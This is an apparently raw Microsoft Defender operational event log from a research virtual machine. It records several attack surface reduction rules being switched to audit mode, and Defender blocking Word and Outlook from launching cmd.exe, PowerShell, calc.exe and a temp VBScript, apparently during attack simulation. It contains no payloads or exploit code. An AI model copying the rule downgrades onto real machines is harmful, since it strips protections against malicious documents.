SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1817 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1816 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1815 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1814 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1813 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1812 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 11/16/2023 03:51:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1811 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-16T15:51:28.553Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:49:14 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1810 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:49:14.419Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: cmd.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1809 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:48:55.840Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1808 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:48:43.137Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1807 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-16T15:48:05.496Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:47:26 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1806 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-16T15:47:26.565Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:46:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1805 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:46:44.558Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: powershell.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/16/2023 03:29:16 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1804 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-16T15:29:16.906Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/16/2023 03:29:07 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1803 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0

11/16/2023 03:29:03 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1802 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1

11/16/2023 03:28:51 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1801 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1

11/16/2023 02:57:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1800 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T14:57:57.040Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/16/2023 12:54:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1744 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

11/16/2023 12:44:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1741 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-16T12:44:53.365Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.693.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/16/2023 12:44:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1740 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0

11/16/2023 12:44:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1739 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1

11/16/2023 12:44:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1738 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1

11/16/2023 03:33:56 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1632 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value:

11/16/2023 01:50:39 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1609 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

11/15/2023 07:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1576 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender

11/15/2023 01:50:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1492 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value:

11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1474 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUControlFlags = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUControlFlags = 0x1

11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1473 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUInterval = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUInterval = 0x4

11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1472 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUReason = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUReason = 0x10

11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1471 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISULength = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISULength = 0x18

11/15/2023 09:49:29 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1321 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

11/15/2023 03:24:34 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1306 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-15T03:24:34.279Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.622.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/15/2023 03:23:41 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1305 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0

11/15/2023 03:23:33 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1304 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1

11/15/2023 03:23:23 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1303 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1

11/14/2023 11:12:42 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1294 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-14T23:12:42.900Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: C:\WindowsAzure\Packages\WaAppAgent.exe Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.622.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=598 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Diagnostics\LastSignatureUpdateResult = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Diagnostics\LastSignatureUpdateResult = 0x0

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=597 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\LowThresholds = 2| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\LowThresholds = 4|1024|128

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=596 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=595 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\HighThresholds = 1024| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\HighThresholds = 16|2048|1024

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=594 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\DiskSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\DiskSensor\MonitoredTargets =

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=593 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CrashSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CrashSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=592 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\LowThresholds = 5| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\LowThresholds = 10|10|10

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=591 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
